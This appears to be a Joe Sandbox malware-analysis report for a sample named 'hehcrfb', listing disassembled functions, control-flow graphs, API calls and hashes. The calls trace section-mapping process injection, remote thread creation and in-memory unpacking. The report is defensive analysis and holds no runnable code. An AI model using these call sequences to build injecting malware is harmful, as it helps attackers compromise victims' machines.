                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                                                • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 333 401557 334 40155b-40156e call 401193 333->334 335 40154f-401554 333->335 338 401570 334->338 339 401573-401578 334->339 335->334 338->339 341 401898-4018a0 339->341 342 40157e-40158f 339->342 341->339 347 4018a5-4018b7 341->347 345 401595-4015be 342->345 346 401896 342->346 345->346 356 4015c4-4015db NtDuplicateObject 345->356 346->347 352 4018c5 347->352 353 4018bc-4018e3 call 401193 347->353 352->353 356->346 358 4015e1-401605 NtCreateSection 356->358 360 401661-401687 NtCreateSection 358->360 361 401607-401628 NtMapViewOfSection 358->361 360->346 364 40168d-401691 360->364 361->360 363 40162a-401646 NtMapViewOfSection 361->363 363->360 366 401648-40165e 363->366 364->346 367 401697-4016b8 NtMapViewOfSection 364->367 366->360 367->346 369 4016be-4016da NtMapViewOfSection 367->369 369->346 370 4016e0 call 4016e5 369->370
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                                                • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                                                • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                                                • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 374 402f97-402fbb 375 402fc1-402fd9 374->375 376 4030ee-4030f3 374->376 375->376 377 402fdf-402ff0 375->377 378 402ff2-402ffb 377->378 379 403000-40300e 378->379 379->379 380 403010-403017 379->380 381 403039-403040 380->381 382 403019-403038 380->382 383 403062-403065 381->383 384 403042-403061 381->384 382->381 385 403067-40306a 383->385 386 40306e 383->386 384->383 385->386 387 40306c 385->387 386->378 388 403070-403075 386->388 387->388 388->376 389 403077-40307a 388->389 389->376 390 40307c-4030eb RtlCreateUserThread NtTerminateProcess 389->390 390->376
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1921587553-0
                                                                                                                                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 5f003c-5f0047 72 5f004c-5f0263 call 5f0a3f call 5f0e0f call 5f0d90 VirtualAlloc 71->72 73 5f0049 71->73 88 5f028b-5f0292 72->88 89 5f0265-5f0289 call 5f0a69 72->89 73->72 91 5f02a1-5f02b0 88->91 93 5f02ce-5f03c2 VirtualProtect call 5f0cce call 5f0ce7 89->93 91->93 94 5f02b2-5f02cc 91->94 100 5f03d1-5f03e0 93->100 94->91 101 5f0439-5f04b8 VirtualFree 100->101 102 5f03e2-5f0437 call 5f0ce7 100->102 104 5f04be-5f04cd 101->104 105 5f05f4-5f05fe 101->105 102->100 107 5f04d3-5f04dd 104->107 108 5f077f-5f0789 105->108 109 5f0604-5f060d 105->109 107->105 111 5f04e3-5f0505 107->111 112 5f078b-5f07a3 108->112 113 5f07a6-5f07b0 108->113 109->108 114 5f0613-5f0637 109->114 122 5f0517-5f0520 111->122 123 5f0507-5f0515 111->123 112->113 115 5f086e-5f08be LoadLibraryA 113->115 116 5f07b6-5f07cb 113->116 117 5f063e-5f0648 114->117 121 5f08c7-5f08f9 115->121 119 5f07d2-5f07d5 116->119 117->108 120 5f064e-5f065a 117->120 124 5f07d7-5f07e0 119->124 125 5f0824-5f0833 119->125 120->108 126 5f0660-5f066a 120->126 127 5f08fb-5f0901 121->127 128 5f0902-5f091d 121->128 129 5f0526-5f0547 122->129 123->129 130 5f07e4-5f0822 124->130 131 5f07e2 124->131 133 5f0839-5f083c 125->133 132 5f067a-5f0689 126->132 127->128 134 5f054d-5f0550 129->134 130->119 131->125 135 5f068f-5f06b2 132->135 136 5f0750-5f077a 132->136 133->115 137 5f083e-5f0847 133->137 143 5f0556-5f056b 134->143 144 5f05e0-5f05ef 134->144 138 5f06ef-5f06fc 135->138 139 5f06b4-5f06ed 135->139 136->117 140 5f084b-5f086c 137->140 141 5f0849 137->141 145 5f06fe-5f0748 138->145 146 5f074b 138->146 139->138 140->133 141->115 147 5f056f-5f057a 143->147 148 5f056d 143->148 144->107 145->146 146->132 151 5f057c-5f0599 147->151 152 5f059b-5f05bb 147->152 148->144 155 5f05bd-5f05db 151->155 152->155 155->134
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_5f0000_hehcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 373 418940-418a80 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00514D70), ref: 00418A1F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418A5C
                                                                                                                                                                • VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418A7B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-3916222277
                                                                                                                                                                • Opcode ID: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
                                                                                                                                                                • Instruction ID: 50ffa957652d6c793d686c1d0a186ca9e6a8cd8bf043fc734a0081a481964278
                                                                                                                                                                • Opcode Fuzzy Hash: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
                                                                                                                                                                • Instruction Fuzzy Hash: B4312918518680CAEB01DB78FC057923B66AB75709F04E1B8D14C8B7B1D7BB051E9B6A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 391 6417d2-6417eb 392 6417ed-6417ef 391->392 393 6417f6-641802 CreateToolhelp32Snapshot 392->393 394 6417f1 392->394 395 641804-64180a 393->395 396 641812-64181f Module32First 393->396 394->393 395->396 402 64180c-641810 395->402 397 641821-641822 call 641491 396->397 398 641828-641830 396->398 403 641827 397->403 402->392 402->396 403->398
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006417FA
                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 0064181A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0063E000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_63e000_hehcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction ID: 4954287a981467cda71b11da07ee6330484a1f8647e48573a15237c190963d38
                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction Fuzzy Hash: CBF0F6321003106FD7203BF4988CBAF77EEEF4A720F100528F652991C0DB70EC854660

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 404 5f0e0f-5f0e24 SetErrorMode * 2 405 5f0e2b-5f0e2c 404->405 406 5f0e26 404->406 406->405
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_5f0000_hehcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 407 4018e6-40194b call 401193 Sleep call 40141f 421 40195a-4019a5 call 401193 407->421 422 40194d-401955 call 401514 407->422 422->421
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                                                                • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 436 401915-401918 437 4018c6-4018c7 436->437 438 40191a-40194b call 401193 Sleep call 40141f 436->438 439 4018d7 437->439 440 4018ce-4018e3 call 401193 437->440 450 40195a-4019a5 call 401193 438->450 451 40194d-401955 call 401514 438->451 439->440 451->450
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                                                                • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 465 4018f1-40194b call 401193 Sleep call 40141f 475 40195a-4019a5 call 401193 465->475 476 40194d-401955 call 401514 465->476 476->475
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                                                                • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 490 401912-40194b call 401193 Sleep call 40141f 501 40195a-4019a5 call 401193 490->501 502 40194d-401955 call 401514 490->502 502->501
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                                                                • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006414E2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0063E000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_63e000_hehcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction ID: 8405aae58695650e6451e26fe30541727dfd333c6564807de2a0821a33172a7c
                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction Fuzzy Hash: B6112B79A00208EFDB01DF98C985E98BFF5AF08350F058094F9499B362D771EA90DB80
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1885482327-0
                                                                                                                                                                • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                                                                • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                                                                APIs
                                                                                                                                                                • LocalAlloc.KERNELBASE(00000000,00514D6C,00418FA2), ref: 00418918
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                                                • Opcode ID: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                                                                • Instruction ID: 452ad643668a9869e20cf026667031a7807d1b47aa2963159c3e27e96442b96b
                                                                                                                                                                • Opcode Fuzzy Hash: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                                                                • Instruction Fuzzy Hash: F0B012B094A2009FDB00CF90FC44B903BB4F358702F00D061F500C1160D7304404EF16
                                                                                                                                                                APIs
                                                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418B34
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418B46
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 2332831159-2547889144
                                                                                                                                                                • Opcode ID: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
                                                                                                                                                                • Instruction ID: 677527fee2e31da48b0f78a64988b8bc3df04c21d5f76ad85ec8a00fc73180d6
                                                                                                                                                                • Opcode Fuzzy Hash: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
                                                                                                                                                                • Instruction Fuzzy Hash: 94116B71A49304BBE7209FA0EC46FEA3F74AB08B11F204129FB04691C1CAB82981875F
                                                                                                                                                                APIs
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 1414951042-2547889144
                                                                                                                                                                • Opcode ID: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
                                                                                                                                                                • Instruction ID: 0a3812f3688d595350d52c489f49ccd1e134694a55c2d67ff5c1230b235e6e50
                                                                                                                                                                • Opcode Fuzzy Hash: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
                                                                                                                                                                • Instruction Fuzzy Hash: B4F0C871B85304ABD7208F94EC46BD97B60FB09725F214259F6046E1C1C7B52951DB8B
                                                                                                                                                                APIs
                                                                                                                                                                • QueryDosDeviceA.KERNEL32(0041B398,?,00000000), ref: 00418C17
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418C32
                                                                                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 00418C51
                                                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418C60
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                                                • String ID:
